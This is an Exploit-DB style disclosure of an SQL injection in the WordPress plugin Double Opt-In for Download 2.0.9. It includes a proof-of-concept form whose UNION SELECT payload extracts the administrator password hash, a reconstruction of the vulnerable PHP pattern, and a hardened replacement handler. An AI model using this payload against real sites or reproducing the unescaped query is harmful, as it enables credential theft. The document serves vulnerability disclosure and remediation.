WordPress Plugin Double Opt-In for Download 2.0.9 - SQL Injection
Author: Kacper Szurek
type: webapps
platform: php
port: 80
date_added: 2016-06-06
date_updated: 2016-06-06
verified: 0
application_url: http://www.exploit-db.comdouble-opt-in-for-download.2.0.9.zip
# Exploit Title: Double Opt-In for Download 2.0.9 SQL Injection
# Date: 06-06-2016
# Software Link: https://wordpress.org/plugins/double-opt-in-for-download/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
`$_POST['id']` is not escaped.
`populate_download_edit_form()` is accessible for every registered user.
http://security.szurek.pl/double-opt-in-for-download-209-sql-injection.html
2. Proof of Concept
Log in as a regular user.
<form name="xss" action="http://wordpress-url/wp-admin/admin-ajax.php?action=populate_download_edit_form" method="post">
<input type="text" name="id" value="0 UNION SELECT 1, 2, 4, 5, 6, 7, user_pass FROM wp_users WHERE ID=1">
<input type="submit" value="Send">
</form>
3. Solution
Update to version 2.1.0.
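The two defects named in the description (an unescaped `$_POST['id']` and an AJAX handler reachable by any logged-in account) and what a fixed handler looks like, as an added illustration that is not the plugin's own code. The table and column names, the nonce action and field name, and the `manage_options` capability are assumptions.

```php
<?php
// Added example, not code from the Double Opt-In for Download plugin.
// Table name, column names, nonce names and the capability are assumed.

// Reconstruction of the vulnerable pattern the advisory describes: the raw
// POST value is concatenated into the SQL, and the only gate is wp_ajax_,
// which every authenticated user passes. Shown for contrast; not hooked.
function vuln_populate_download_edit_form() {
    global $wpdb;
    $row = $wpdb->get_row( "SELECT * FROM {$wpdb->prefix}doifd_downloads WHERE id = " . $_POST['id'] );
    wp_send_json( $row );
}

// Hardened handler: capability check, CSRF nonce, integer cast, prepared query.
add_action( 'wp_ajax_populate_download_edit_form', 'safe_populate_download_edit_form' );
function safe_populate_download_edit_form() {
    global $wpdb;

    // 1. Authorization: editing downloads is an administrative task, so require
    //    a capability rather than merely a logged-in session.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 2. CSRF: the admin page rendering the edit form must emit
    //    wp_nonce_field( 'doifd_edit_download', '_doifd_nonce' ) (assumed names);
    //    check_ajax_referer() dies with a 403 if the nonce is absent or stale.
    check_ajax_referer( 'doifd_edit_download', '_doifd_nonce' );

    // 3. Input: the id is a row number, so cast it; anything non-numeric becomes 0.
    $id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    if ( 0 === $id ) {
        wp_send_json_error( 'invalid id', 400 );
    }

    // 4. Query: bind the value with $wpdb->prepare() so it can never alter the
    //    statement; %d also re-enforces the integer type.
    $table = $wpdb->prefix . 'doifd_downloads'; // assumed table name
    $row   = $wpdb->get_row(
        $wpdb->prepare( "SELECT id, title FROM {$table} WHERE id = %d", $id )
    );
    if ( null === $row ) {
        wp_send_json_error( 'not found', 404 );
    }
    wp_send_json_success( $row );
}
```

With the hardened handler, the form in the proof of concept fails at the capability check for a regular user, at the nonce check for an administrator lured into submitting it, and at the integer cast even if both were bypassed.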